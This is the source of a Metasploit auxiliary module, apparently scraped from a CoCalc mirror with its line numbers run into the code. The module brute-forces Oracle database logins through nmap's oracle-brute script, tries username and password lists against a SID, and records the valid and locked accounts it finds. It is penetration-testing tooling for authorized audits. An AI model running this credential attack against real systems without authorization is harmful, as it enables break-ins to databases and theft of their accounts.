CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/oracle/oracle_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Auxiliary::Nmap8include Msf::Auxiliary::AuthBrute9include Msf::Auxiliary::Scanner1011# Creates an instance of this module.12def initialize(info = {})13super(update_info(info,14'Name' => 'Oracle RDBMS Login Utility',15'Description' => %q{16This module attempts to authenticate against an Oracle RDBMS17instance using username and password combinations indicated18by the USER_FILE, PASS_FILE, and USERPASS_FILE options.1920Due to a bug in nmap versions 6.50-7.80 may not work.21},22'Author' => [23'Patrik Karlsson <patrik[at]cqure.net>', # the nmap NSE script, oracle-brute.nse24'todb' # this Metasploit module25],26'License' => MSF_LICENSE,27'References' =>28[29[ 'URL', 'https://www.oracle.com/database/' ],30[ 'CVE', '1999-0502'], # Weak password CVE31[ 'URL', 'https://nmap.org/nsedoc/scripts/oracle-brute.html']32]33))3435register_options(36[37OptPath.new('USERPASS_FILE', [ false, "File containing (space-separated) users and passwords, one pair per line",38File.join(Msf::Config.data_directory, "wordlists", "oracle_default_userpass.txt") ]),39OptString.new('SID', [ true, 'The instance (SID) to authenticate against', 'XE'])40])4142end4344def minimum_nmap_version45"5.50"46end4748def run49unless nmap_version_at_least? minimum_nmap_version50print_error "Installed Nmap version is not at least #{minimum_nmap_version}. Exiting..."51return false52end53print_status "Nmap: Setting up credential file..."54credfile = create_credfile55cred_count = 056each_user_pass(true) {|user, pass| credfile[0].puts "%s/%s" % [user,pass]; cred_count += 1 }57credfile[0].flush58nmap_build_args(credfile[1])59print_status "Nmap: Starting Oracle bruteforce with #{cred_count} credentials against SID '#{sid}'..."60nmap_run61credfile[0].unlink62if Rex::Parser.nokogiri_loaded63nmap_hosts {|type,data| process_nokogiri_callback(type,data)}64else65nmap_hosts {|host| process_host(host)}66end67end6869def sid70datastore['SID'].to_s71end7273def nmap_build_args(credpath)74nmap_reset_args75nmap_append_arg "-P0"76nmap_append_arg "--script oracle-brute"77script_args = [78"tns.sid=#{sid}",79"brute.mode=creds",80"brute.credfile=#{credpath}",81"brute.threads=1"82]83script_args << "brute.delay=#{set_brute_delay}"84nmap_append_arg "--script-args \"#{script_args.join(",")}\""85nmap_append_arg "-n"86nmap_append_arg "-v" if datastore['VERBOSE']87end8889# Sometimes with weak little 10g XE databases, you will exhaust90# available processes from the pool with lots and lots of91# auth attempts, so use bruteforce_speed to slow things down92def set_brute_delay93case datastore["BRUTEFORCE_SPEED"]94when 4; 0.2595when 3; 0.596when 2; 197when 1; 1598when 0; 60 * 599else; 0100end101end102103def create_credfile104outfile = Rex::Quickfile.new("msf3-ora-creds-")105if Rex::Compat.is_cygwin and self.nmap_bin =~ /cygdrive/i106outfile_path = Rex::Compat.cygwin_to_win32(outfile.path)107else108outfile_path = outfile.path109end110@credfile = [outfile,outfile_path]111end112113def process_nokogiri_callback(type,data)114return unless type == :port_script115return unless data["id"] == "oracle-brute"116return unless data[:addresses].has_key? "ipv4"117return unless data[:port]["state"] == ::Msf::ServiceState::Open118addr = data[:addresses]["ipv4"].to_s119port = data[:port]["portid"].to_i120output = data["output"]121parse_script_output(addr,port,output)122end123124def process_host(h)125h["ports"].each do |p|126next if(h["scripts"].nil? || h["scripts"].empty?)127h["scripts"].each do |id,output|128next unless id == "oracle-brute"129parse_script_output(h["addr"],p["portid"],output)130end131end132end133134def extract_creds(str)135m = str.match(/\s+([^\s]+):([^\s]+) =>/)136m[1,2]137end138139def report_cred(opts)140service_data = {141address: opts[:ip],142port: opts[:port],143service_name: opts[:service_name],144protocol: 'tcp',145workspace_id: myworkspace_id146}147148credential_data = {149origin_type: :service,150module_fullname: fullname,151username: opts[:user],152private_data: opts[:password],153private_type: :password154}.merge(service_data)155156login_data = {157core: create_credential(credential_data),158status: opts[:status],159proof: opts[:proof]160}.merge(service_data)161162create_credential_login(login_data)163end164165def parse_script_output(addr,port,output)166msg = "#{addr}:#{port} - Oracle -"167@oracle_reported = false168if output =~ /TNS: The listener could not resolve \x22/n169print_error "#{msg} Invalid SID: #{sid}"170elsif output =~ /Accounts[\s]+No valid accounts found/nm171print_status "#{msg} No valid accounts found"172else173output.each_line do |oline|174if oline =~ /Login correct/175if not @oracle_reported176report_service(:host => addr, :port => port, :proto => "tcp", :name => "oracle")177report_note(:host => addr, :port => port, :proto => "tcp", :type => "oracle.sid", :data => sid, :update => :unique_data)178@oracle_reported = true179end180user,pass = extract_creds(oline)181pass = "" if pass == "<empty>"182print_good "#{msg} Success: #{user}:#{pass} (SID: #{sid})"183report_cred(184ip: addr,185port: port,186user: "#{sid}/#{user}",187password: pass,188service_name: 'tcp',189status: Metasploit::Model::Login::Status::SUCCESSFUL190)191elsif oline =~ /Account locked/192if not @oracle_reported193report_service(:host => addr, :port => port, :proto => "tcp", :name => "oracle")194report_note(:host => addr, :port => port, :proto => "tcp", :type => "oracle.sid", :data => sid, :update => :unique_data)195@oracle_reported = true196end197user = extract_creds(oline)[0]198print_good "#{msg} Locked: #{user} (SID: #{sid}) -- account valid but locked"199report_cred(200ip: addr,201port: port,202user: "#{sid}/#{user}",203service_name: 'tcp',204status: Metasploit::Model::Login::Status::DENIED_ACCESS205)206elsif oline =~ /^\s+ERROR: (.*)/207print_error "#{msg} NSE script error: #{$1}"208end209end210end211end212end213214215